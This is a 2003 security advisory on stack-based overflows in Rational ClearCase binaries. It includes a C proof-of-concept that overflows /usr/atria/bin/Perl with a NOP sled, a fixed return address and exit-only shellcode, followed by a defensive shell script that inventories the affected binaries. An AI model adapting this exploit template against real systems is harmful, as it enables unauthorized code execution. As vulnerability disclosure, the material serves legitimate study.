/*

*********************************************************************

$ An open security advisory #3 - Rational ClearCase Binary POC Code

*******************************************************************

1: Bug Researcher: c0ntex@hushmail.com

2: Bug Released: September 2003

3: Bug Impact Rate: Low / Medium

4: Bug Scope Rate: Local / Remote

*******************************************************************

*******************************************************************

The definition of Rational in the dictionary:

Definition: [adj] having its source in or being guided by the intellect (distinguished from

experience or emotion); "a rational analysis" [adj] of or associated with or requiring the use

of the mind; "intellectual problems"; "the triumph of the rational over the animal side of man"

There are so far 10 separate binaries, including the below, that are vulnerable to some form of

stack-based attack. All architectures are vulnerable in some form too. It is also possible to

own remote machines from the ClearCase binaries.

[-] Vuln Binary              [-] Vuln Architectures                 [-] Execute Code?

/usr/atria/bin/Perl          Intel, Alpha, RISC, Possible SPARC     Yes
/usr/atria/bin/notify        Intel, Alpha, RISC, Possible SPARC     Yes
/usr/atria/bin/cleartool     Intel, Alpha, RISC, Possible SPARC     Yes
/usr/atria/etc/scrubber      Intel, Alpha, RISC, Possible SPARC     Yes
/usr/atria/etc/mount_mvfs    Intel, Alpha, RISC, Possible SPARC     Yes
/usr/atria/etc/imsglog       Intel, Alpha, RISC, Possible SPARC     Yes
/usr/atria/etc/Gzip          Intel, Alpha, RISC, Possible SPARC     Yes

None are set SETUID which made people think this was not a threat :D What can I say.

********************************************************************

$ Rational informed 4 weeks ago, no feedback since.

$ Work around: Remove software until a patch has been released.

********************************************************************

*/

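#include <stdio.h>   /* printf, fprintf */
#include <stdlib.h>  /* atol */
#include <string.h>  /* strlen, memcpy */
#include <unistd.h>  /* geteuid, _exit, execlp */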

#define VER "ClearCase Smack_Crack_And_Hack_Attack Version 1.0.1"

#define NULL (void *)0

#define NOP 0x90

#define RET 0xbfffd838

#define Bucket 1300

char l33t_haXor_c0d3[] = "\x31\xc0\xfe\xc0\xcd\x80";

/*

8048091: 31 c0 xor %eax,%eax

8048093: fe c0 inc %al

8048095: cd 80 int $0x80

*/

int main(int argc, char *argv[]) {
    char clearcrush[Bucket];
    unsigned long int badd_add;
    unsigned short int delta = 0;
    unsigned short int i, safety;

    while((safety = geteuid()) == 0) {
        fprintf(stderr, "My shellcode could be trojan c0d3z, tsk *lol* \n");
        _exit(1);
    }

    if(argc > 1) {
        delta = atol(argv[1]);
    }

    printf("\n\n*************************************************************\n"
           "*************************************************************\n");
    printf("[-] %s\n", VER);
    printf("[-] Bug discovered and PoC developed by c0ntex@hushmail.com.\n"
           "[-] --------------------------------------------------------\n"
           "[-] with a little bit of copy & paste skill.\n"
           "[-] --------------------------------------------------------\n"
           "[-] Values from around -2000 -> +2000 should work quite well.\n"
           "[-] Or add a request to get current esp value and use that.\n"
           "[-] --------------------------------------------------------\n"
           "[-] Usage: %s delta_value\n", argv[0]);

    badd_add = RET + delta;

    for(i = 0; i < Bucket; i += 4)
        *(long *) &clearcrush[i] = badd_add;

    for(i = 0; i < (Bucket - strlen(l33t_haXor_c0d3) - 100); ++i)
        *(clearcrush + i) = NOP;

    memcpy(clearcrush + i, l33t_haXor_c0d3, strlen(l33t_haXor_c0d3));

    printf("[-] Using Return address 0x%lx\n", badd_add);
    printf("[-] Using delta value %d\n", delta);
    printf("*************************************************************\n"
           "*************************************************************\n\n");

    execlp("/usr/atria/bin/Perl", "Perl", clearcrush, NULL);

    return 0;
}
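
Added example, not part of the original advisory or its PoC: a POSIX shell check that inventories the seven binaries named in the advisory table on a host or a mounted image, to support the stated work-around of removing the software. The function name `audit_clearcase` and its root-prefix argument are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the advisory): inventory the binaries the advisory
# lists. Paths are copied from the advisory table; everything else is assumed.

ADVISORY_BINARIES="/usr/atria/bin/Perl
/usr/atria/bin/notify
/usr/atria/bin/cleartool
/usr/atria/etc/scrubber
/usr/atria/etc/mount_mvfs
/usr/atria/etc/imsglog
/usr/atria/etc/Gzip"

# audit_clearcase ROOT
#   ROOT is a prefix (assumption): "/" for the live system, or the mount
#   point of an offline image.
# Prints "STATUS<TAB>path" for every listed binary:
#   ABSENT  - not found under ROOT
#   PRESENT - installed without setuid/setgid, as the advisory describes
#   SETID   - installed with a setuid or setgid bit (differs from the advisory;
#             a local overflow would then also cross a privilege boundary)
# Returns 0 if every listed binary is absent, 1 otherwise.
audit_clearcase() {
    root=${1%/}
    found=0
    for rel in $ADVISORY_BINARIES; do
        f="$root$rel"
        if [ ! -e "$f" ]; then
            status=ABSENT
        elif [ -u "$f" ] || [ -g "$f" ]; then
            status=SETID
            found=1
        else
            status=PRESENT
            found=1
        fi
        printf '%s\t%s\n' "$status" "$rel"
    done
    return "$found"
}

# Usage: audit_clearcase /            (live host)
#        audit_clearcase /mnt/image   (constructed example mount point)
```

A non-zero return means at least one listed binary is still installed and the work-around has not been fully applied on that host.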

